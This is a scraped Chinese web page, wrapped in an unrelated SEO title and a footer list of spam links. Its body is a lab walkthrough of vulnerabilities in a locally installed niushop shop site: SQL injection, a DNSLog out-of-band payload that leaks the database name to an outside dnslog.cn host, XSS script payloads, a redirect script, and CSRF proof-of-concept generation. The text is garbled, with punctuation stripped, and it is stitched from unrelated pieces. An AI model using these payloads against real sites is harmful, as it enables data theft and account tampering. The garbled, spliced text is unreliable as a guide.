当前位置: 首页 > news >正文

网站投资设计coding 部署wordpress

网站投资设计,coding 部署wordpress,淮安网站制作设计,太原网站建设费用靶场搭建 将 niushop-master.zip 压缩包放到网站的根目录#xff0c;解压后访问 浏览器访问 install.php #xff0c;根据提示安装即可 1.SQL注入漏洞 随便选择一种商品分类#xff0c;发现有参数#xff0c;测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题解压后访问 浏览器访问 install.php 根据提示安装即可 1.SQL注入漏洞 随便选择一种商品分类发现有参数测试注入 测试闭合发现页面报错有sql注入 应该是环境的问题但是这不影响我们判断存在sql注入 该网站还有一处sql注入漏洞我们可以进入后台系统--设置--数据库管理--SQL执行与导入 输入查询语句点击执行成功执行但是我们得不到具体信息这时需要利用外带注入方法 外带原理将dnslog平台中的特有字段payload带⼊⽬标发起dns请求通过dns解析将请求后的关键信息组合新的三级域名带出在dns服务器的dns⽇志中显示出来 DNSLog Platform select load_file(concat(\\\\,(select database()),.95xpzc.dnslog.cn\\abc)) 文件上传漏洞 1.首先写一个一句话木马 XSS漏洞 反射型xss漏洞 登录后台系统--设置--基础设置--商城第三方统计代码 在输入框中输入js弹窗代码,然后点击提交 scriptalert(1)/script 返回前端页面刷新出现弹窗 后台系统还有一处反射型xss漏洞点击网站--广告位--添加广告 scriptalert(1)/script 返回前端刷新点击该广告页面会出现弹窗 存储型xss漏洞 后台系统还有一处点击网站--广告位--添加广告 这里的 链接地址 可以尝试xss 在自己网站的根目录新建一个 2.html 文件内容如下 scriptdocument.locationhttp://www.baidu.com/script 链接地址修改为www下的 2.html 返回前端刷新页面点击此广告页面就会跳转到设置的界面 CSRF漏洞 注册一个普通用户登录以后修改基本信息 使用bp抓取提交信息的请求包鼠标右键--相关工具--生成CSRF-Poc--复制HTML 将复制的内容放到自己本地网站的根目录浏览器访问 点击按钮就会发现用户信息被修改说明存在CSRF漏洞 支付漏洞
http://www.hkea.cn/news/14365907/

相关文章:

  • 文学网站建设学校网站开发实际意义
  • 哪个网站的ppt模板最好重庆装修价格明细表
  • 网站没备案如何做淘宝客济南网站排名优化报价
  • dw做的网站如何使用太原网络营销公司
  • 网站产品详情用哪个软件做的奇客影院wordpress
  • qq开放平台网站开发申请不通过的原因无锡那家网络公司做网站好
  • 网站建设代码编译的问题及解决方案wordpress七牛
  • 文化局网站建设方案中国建设网站企业网上银行业务功能
  • 利用云盘做网站有空间怎么做网站
  • 做网站用小动画自己建的网站也要注册域名吗
  • 厦门网站建设培训机构网站空间 按流量计费
  • 宁夏网站设计几十万做网站平台
  • 昆山市建设局网站途途外贸企业网站管理系统
  • 网站建设方案2018在线logo制作生成免费
  • 酒店 手机网站模板金湖建设工程质量监督网站
  • 小白用网站建设工具wordpress 留言簿
  • 做网站公司哪里好加强网站技术建设
  • 做全国社保代理的网站平台建设网站公司
  • 郑州网站建设与设计湖北省市政工程建设官方网站
  • 浙江建设银行网站深圳英文网站建设去哪家
  • 收录查询站长工具徐州手机网站制作公司
  • 学校网站建设和维护情况柳州网站虚拟主机公司
  • 北京房山网站建设网易企业邮箱和个人邮箱的区别
  • 高校财务网站建设前端开发包括哪些内容
  • 株洲网站建设 李东莞网站设计出名 乐云践新
  • 微商城网站建设鄂州建设工程造价信息管理网站
  • 阿里云网站建设9元seo关于网站搜索
  • 手机网站关键编写一个android应用程序
  • 电商网站建设需要多少钱一年企业vi品牌设计公司
  • 好一点的网站建设网站被墙301怎么做